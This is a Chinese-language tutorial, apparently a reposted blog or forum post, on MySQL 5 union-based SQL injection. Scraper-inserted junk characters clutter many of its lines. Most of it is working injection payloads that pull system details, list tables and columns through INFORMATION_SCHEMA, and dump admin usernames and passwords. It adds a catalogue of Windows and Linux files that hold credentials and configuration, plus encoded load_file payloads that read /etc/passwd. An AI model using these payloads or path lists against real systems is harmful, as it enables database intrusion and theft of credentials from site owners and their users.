mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
7 D# i2 a) o: G$ V
3 `: M9 P3 L% W; e. K7 [

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
8 F1 V1 k  E, G9 u; l' @" a明。
, g& t0 ^+ F* ^% t/ `6 |1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
1 F( `( n& D4 x4 N0 _+ {|—字段：SCHEMA_NAME ->数据库名称

5 c; o4 }1 N/ ?1 z# r5 V# f|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
/ z0 ^" V- t: l. X3 u" I5 U|—字段：TABLE_NAME ->存储表的表名

6 l5 L9 H" w: i- g; ~: L4 j" L$ U|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
- [0 Z9 b2 ^/ m3 T8 d& G) L|—字段：TABLE_NAME ->存储所属表的名称

* v5 |7 n- f8 x|—字段：COLUMN_NAME ->该字段的名称

! A: H( a' s0 |" O6 k#########################################################################
+ L- b* f1 W- k2 X+ n1 d##

- c: U. j( V% ^- v0×001 获取系统信息:
* D! ]- J$ i1 ]; C# Y$ m5 ?" d
: X: W/ D9 |7 Z  R; nunion select 1,2,3,4,5,concat
8 X2 H3 I/ Y9 U4 P' T4 D6 L(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
( Q* {; z* ]8 I) m# m2 e3 v9 B: G
/*
$ I9 \7 a6 @/ n% W9 o
$ f  o9 |. ~! W5 \( \@@global.version_compile_os 获取系统版本
1 [# N6 S( p. y: K" H
7 I3 y* H1 e8 \: q7 x6 r@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值

*/

######################################################################

  D! b/ \/ h. h' |$ L0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
! J# O: h3 q+ _9 J; N0 Y3 b
/*
7 ~! z, l, ?3 s5 J5 B+ F  ~/ y
1 W% N4 v* H  O1 S0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

7 H, p  j3 z' d% d* j, l, Y( Y) P* _( O1 x*/

######################################################################

0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and


& R* c: F) s$ Atable_schema=0x67617264656e limit 1 /*

/*
, c% O" F/ V0 ^" G% a! r; Z" ~
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
* b1 [6 n# T0 O* G9 P$ l- D# R
0x67617264656e ->数据库名
" g: g  _8 z' x. U
*/
3 u" F+ a0 W% A3 K
#####################################################################
5 B& _  A. [! o4 d
0×004 获取数据
  o/ Q8 o0 i" r
& t" D- |0 d) w/ d0 T/ K: L. kunion select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
2 R9 F: ^# `" ]6 O
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
" _) }1 X: q! J7 y
+ y  P" [2 c- A& m5 M6 |- n/*

0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据
: i+ n# w6 N& p' `/ F
$ u# D$ ~' q9 ^3 X/ P/ H# i% z0 Z*/
3 z) _$ I, w4 f5 M9 B
, f9 |9 n" \* G* B, n4 }7 u


9 E' p. |- T  ^3 y
顺便添加一些mysql注入时非常有用的一些东西
- @# H6 T1 M4 J% [6 }! m( h/ G
9 v" N; M2 f6 E& J简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
0 d  g0 q$ Z: D8 ~2:user()        用户名
3:current_user()  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
- D; S* ?2 [/ \3 B" f7:load_file()   MYSQL读取本地文件的函数
4 H( {" ^1 z  m" [8 X  F8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
' H$ k* O! a! r" P; P" W& t  l- z10@version_compile_os   操作系统  Windows Server 2003,
: i- j/ e; A  B) \9 O* u收集的一些路径：
. p* q, t% }+ ^4 h; GWINDOWS下:
c:/boot.ini          //查看系统版本
9 J  b, ^0 i8 ^3 H! A% o/ [c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
9 m3 Y- Z. h- S* {3 y' @8 Qc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
8 \5 D1 d6 [+ C6 ?# [c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
; Z9 m  M/ U! v2 Dc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
$ i/ D' x4 M* }; ]% j8 B2 i  wc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
/ @! C7 x1 ?0 {7 a1 h4 A//存储了pcAnywhere的登陆密码
, Y& _7 r; y7 k0 S: Z/ B. G2 w" \c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
5 }8 ]; ~* \; w

$ X( q! _" l* xc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
# Q* c6 S- C( a1 v( _d:\APACHE\Apache2\conf\httpd.conf
$ ^" g3 W# }0 RC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
9 D) `' G, U! o$ ]; v2 y. z5 W8 _
LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
+ Z- M% r2 X) M0 ]- s7 }5 W# C/ _/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
2 l# V7 m! U( a/ _/usr/local/app/php5/lib/php.ini //PHP相关设置
% g7 q' q3 P2 ^1 K/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
0 u6 \+ i. @7 H* N: B$ ~; J  Z* m/etc/redhat-release //系统版本
/etc/issue
4 q" H$ ]) [7 n  f2 f; ?/etc/issue.net
! V/ P  t) D6 D  O+ t/usr/local/app/php5/lib/php.ini //PHP相关设置
0 ]& P  W; O6 w( o7 L: ]/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
* C9 P8 c0 X7 H8 {; D' N/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
; f* }) r3 H3 l! e2 P- t" G: m/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
- i% I: X* w8 [2 {/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
# ?5 O; Y' G2 V# A' H9 R/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
" c; y3 C. r0 a- h8 Aload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
6 z1 |  G" E5 Ereplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
+ s' K: k1 D' M. O8 @2 Yreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
- `7 L, Z. L- p9 K$ i/ r# W